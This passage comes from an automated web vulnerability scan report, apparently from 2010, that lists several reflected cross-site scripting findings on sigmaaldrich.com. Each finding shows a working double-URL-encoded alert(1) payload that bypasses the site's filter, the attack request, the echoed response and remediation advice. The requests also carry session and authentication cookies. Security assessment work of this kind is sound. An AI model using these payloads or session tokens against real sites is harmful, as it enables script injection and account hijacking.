bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:39 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science33260";alert(1)//d3b818a82c5/your-favorite-gene-search/yfg-pbi.html","E404") ;
   </script>
...[SNIP]...

1.580. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search/yfg-pbi.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/your-favorite-gene-search/yfg-pbi.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94d01%2522%253balert%25281%2529%252f%252fa84259c19b was submitted in the REST URL parameter 2. This input was echoed as 94d01";alert(1)//a84259c19b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. Here the double-encoded payload passes the filter after the web server's single decode, and the application then decodes it a second time, so the quote and semicolon reach the script unfiltered.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it cannot be avoided, the value should be escaped for a JavaScript string literal (quotes, backslashes, angle brackets and line terminators written as \uXXXX escapes) at the point where it is written into the script. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/your-favorite-gene-search94d01%2522%253balert%25281%2529%252f%252fa84259c19b/yfg-pbi.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:41 GMT
Content-Length: 28954
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/your-favorite-gene-search94d01";alert(1)//a84259c19b/yfg-pbi.html","E404") ;
   </script>
...[SNIP]...

1.581. http://www.sigmaaldrich.com/life-science/your-favorite-gene-search/yfg-pbi.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/your-favorite-gene-search/yfg-pbi.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f873%2522%253balert%25281%2529%252f%252f61d38aeeb24 was submitted in the REST URL parameter 3. This input was echoed as 4f873";alert(1)//61d38aeeb24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. Here the double-encoded payload passes the filter after the web server's single decode, and the application then decodes it a second time, so the quote and semicolon reach the script unfiltered.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it cannot be avoided, the value should be escaped for a JavaScript string literal (quotes, backslashes, angle brackets and line terminators written as \uXXXX escapes) at the point where it is written into the script. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/your-favorite-gene-search/yfg-pbi.html4f873%2522%253balert%25281%2529%252f%252f61d38aeeb24 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:43 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/your-favorite-gene-search/yfg-pbi.html4f873";alert(1)//61d38aeeb24","E404") ;
   </script>
...[SNIP]...

1.582. http://www.sigmaaldrich.com/life-science/zinc-finger-nuclease-technology.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/zinc-finger-nuclease-technology.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe8ec%2522%253balert%25281%2529%252f%252fdc9aa4fa39f was submitted in the REST URL parameter 1. This input was echoed as fe8ec";alert(1)//dc9aa4fa39f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. Here the double-encoded payload passes the filter after the web server's single decode, and the application then decodes it a second time, so the quote and semicolon reach the script unfiltered.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it cannot be avoided, the value should be escaped for a JavaScript string literal (quotes, backslashes, angle brackets and line terminators written as \uXXXX escapes) at the point where it is written into the script. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencefe8ec%2522%253balert%25281%2529%252f%252fdc9aa4fa39f/zinc-finger-nuclease-technology.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:33 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencefe8ec";alert(1)//dc9aa4fa39f/zinc-finger-nuclease-technology.html","E404") ;
   </script>
...[SNIP]...

1.583. http://www.sigmaaldrich.com/life-science/zinc-finger-nuclease-technology.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/zinc-finger-nuclease-technology.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2e65%2522%253balert%25281%2529%252f%252fadb288c3908 was submitted in the REST URL parameter 2. This input was echoed as d2e65";alert(1)//adb288c3908 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. Here the double-encoded payload passes the filter after the web server's single decode, and the application then decodes it a second time, so the quote and semicolon reach the script unfiltered.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it cannot be avoided, the value should be escaped for a JavaScript string literal (quotes, backslashes, angle brackets and line terminators written as \uXXXX escapes) at the point where it is written into the script. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/d2e65%2522%253balert%25281%2529%252f%252fadb288c3908 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:35 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/d2e65";alert(1)//adb288c3908","E404") ;
   </script>
...[SNIP]...

1.584. http://www.sigmaaldrich.com/materials-science.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ed07%2522%253balert%25281%2529%252f%252f58c74c259d was submitted in the REST URL parameter 1. This input was echoed as 4ed07";alert(1)//58c74c259d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. Here the double-encoded payload passes the filter after the web server's single decode, and the application then decodes it a second time, so the quote and semicolon reach the script unfiltered.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it cannot be avoided, the value should be escaped for a JavaScript string literal (quotes, backslashes, angle brackets and line terminators written as \uXXXX escapes) at the point where it is written into the script. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /4ed07%2522%253balert%25281%2529%252f%252f58c74c259d HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
